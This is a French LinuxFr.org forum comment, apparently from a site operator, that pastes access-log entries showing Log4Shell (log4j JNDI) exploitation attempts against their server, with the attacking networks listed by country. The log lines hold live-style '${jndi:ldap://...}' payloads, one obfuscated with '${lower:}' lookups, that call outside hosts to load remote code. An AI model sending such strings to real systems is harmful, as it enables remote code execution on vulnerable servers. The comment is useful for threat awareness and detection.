• # Logs LinuxFr.org

    Posté par (site web personnel) . En réponse au lien Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package. Évalué à 10. Dernière modification le 11 décembre 2021 à 13:09.

    45.155.205.<snip> - - [10/Dec/2021:14:14:08 +0100] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.155.205.<snip>:12344/Basic/Command/Base64/<snip>"
    (...)
    45.137.21.<snip> - - [11/Dec/2021:03:25:44 +0100] "POST / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.137.21.<snip>:1389/Basic/Command/Base64/<snip>"
    (...)
    20.71.156.<snip> - - [11/Dec/2021:05:51:53 +0100] "GET /$%7Bjndi:ldap://45.130.229.<snip>:1389/Exploit%7D HTTP/1.1" 301 178 "-" "Mozilla/5.0 zgrab/0.x"
    (...)
    45.153.160.<snip> - - [10/Dec/2021:18:59:19 +0100] "GET / HTTP/1.1" 301 162 "-" "${jndi:ldap://<snip>:39356/a}"
    (...)
    195.251.41.<snip> - - [11/Dec/2021:02:11:36 +0100] "GET /$%7Bjndi:ldap://45.130.229.<snip>:1389/Exploit%7D HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x"
    (...)
    185.220.101.<snip> - - [11/Dec/2021:12:19:35 +0100] "GET / HTTP/1.1" 301 483 "-" "${jndi:ldap://205.185.115.<snip>:47324/a}"
    (...)
    137.184.106.<snip> - - [11/Dec/2021:10:38:44 +0100] "GET / HTTP/1.1" 200 8587 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://<snip>:80/callback}"
    

    Russie RU-ITRESHENIYA, Bangladesh BD-ROOTLAYER-20190805, Microsoft, Singapour/Chypre, Pays-Bas Moneroj-VPS ou NFORCE_ENTERTAINMENT, Grèce EUGENIDES-GR, États-Unis DIGITALOCEAN-167-71-0-0, Australie APNIC-ERX-146-56-0-0, Brésil DIQUA12, Allemagne Tor-Exit, Chine ALISOFT... Cet appel au voyage et à la rêverie.